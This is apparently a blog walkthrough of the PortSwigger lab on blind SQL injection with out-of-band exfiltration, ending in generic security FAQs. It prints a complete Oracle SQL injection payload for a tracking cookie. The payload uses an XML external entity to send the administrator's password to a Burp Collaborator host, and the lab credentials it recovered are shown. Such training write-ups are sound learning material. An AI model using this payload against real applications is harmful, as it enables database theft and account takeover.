Introduction
In this article, we will cover the PortSwigger Web Security lab on “Blind SQL injection with out-of-band data exfiltration” step by step with practical examples.
Lab Description
This lab focuses on Blind SQL injection vulnerabilities. The application uses a tracking cookie for analytics and performs SQL queries based on the submitted cookie’s value.
In this lab, we won’t see any direct impact of the query’s response on the application. However, we can still trigger blind SQL injection using an external domain and out-of-band interaction attacks.
The database contains different tables, including a table named “users” that has columns for usernames and passwords. We need to extract the administrator’s credentials and log in to the application.
To perform this attack, you will need a feature called Burp Collaborator in Burp Suite Professional.
Lab Solution
First, access the lab.
We will exploit the lab using SQL injection techniques, along with basic XXE (XML External Entity) techniques.
Intercept the lab’s first page or index page in Burp Suite and send it to the repeater for testing.
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
If you have a basic understanding of SQL and XML, you can easily read this code. It performs a union attack and uses XML to extract the password from the “users” table where the username is “administrator.” All this information will be received in Burp Collaborator.
Copy the Burp Collaborator payload. In my case, it is (zgj4viy4v0s8sik8hz7tbe9dv41vpk.oastify.com). Paste it into the previous payload.
The final version is as follows:
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.zgj4viy4v0s8sik8hz7tbe9dv41vpk.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--
Place this payload in the trackingid cookie of the same index page request.
ap dak skty ke dns main password recieved ho gya hain hame. ma na 2 bar request forward kar li q ke 1st time thora delay ho gya tha response main ap thora wait kar lana ap ko respone mil jaya ga burp collab main.
username=administrator and password=1g80ui39g75a2wvd0hgv
I have successfully logged into the application, solving the PortSwigger Web Security lab on “Blind SQL injection with out-of-band data exfiltration.”
You can learn everything related to web security on our website. We upload the latest articles on web security topics on a daily basis, so stay with us.
To continue studying check out the next lab i.e. SQL Injection With Filter Bypass Via XML Encoding, cover the current lab before visiting the next lab. Good Luck!
FAQS
Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.
Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.
It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up-to-date, avoid malicious websites and links, and always enable 2-factor authentication while avoiding clickjacking.
Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.
